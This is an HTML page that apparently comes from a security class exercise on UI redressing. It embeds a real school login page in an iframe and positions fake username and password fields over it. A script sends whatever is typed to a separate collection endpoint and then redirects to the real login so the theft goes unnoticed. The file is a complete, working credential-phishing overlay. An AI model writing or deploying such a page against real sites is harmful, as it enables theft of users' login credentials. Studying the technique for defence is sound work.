<style>
    .form-inputfield-first {
        position: fixed;
        top: 240px;
        right: 784px;
        margin: 0px;
        padding: 3px;
        font-size: 13px;
        width: 370px;
    }
    .form-inputfield-second {
        position: fixed;
        top: 290px;
        right: 784px;
        margin: 0px;
        padding: 3px;
        font-size: 13px;
        width: 370px;
    }
    .form-button {
        padding: 2px 7px;
        position: fixed;
        top: 352px;
        left: 766px;
    }
</style>

<body>
    <iframe id="myframe" src="https://gibz.zg.ch/login/" style="border: 0; width: 100%; height: 100%" title="Eduzug"></iframe>
   
    <input id="username" type="text" class="form-inputfield-first">
    <input id="password" type="password" class="form-inputfield-second">
    <button class="form-button" onclick="send()">Anmelden</button>
</body>

<script>
    function send() {
        var payload = {
            "username": document.getElementById('username').value,
            "password": document.getElementById('password').value
        };

        fetch('https://m183.gibz-informatik.ch/api/uiredresscredential', {
            method: 'POST',
            headers: {
            'Content-Type': 'application/json',
            'X-Api-Key': 'NAAzADcANwAwADcANAA1ADYANAA3ADEAOAA0ADkAMgA4ADgA',
            },
            body: JSON.stringify(payload),
        });

        setTimeout(function() {
            window.location.href = 'https://gibz.zg.ch/login/sls/auth';
        }, 2000);
    }
</script>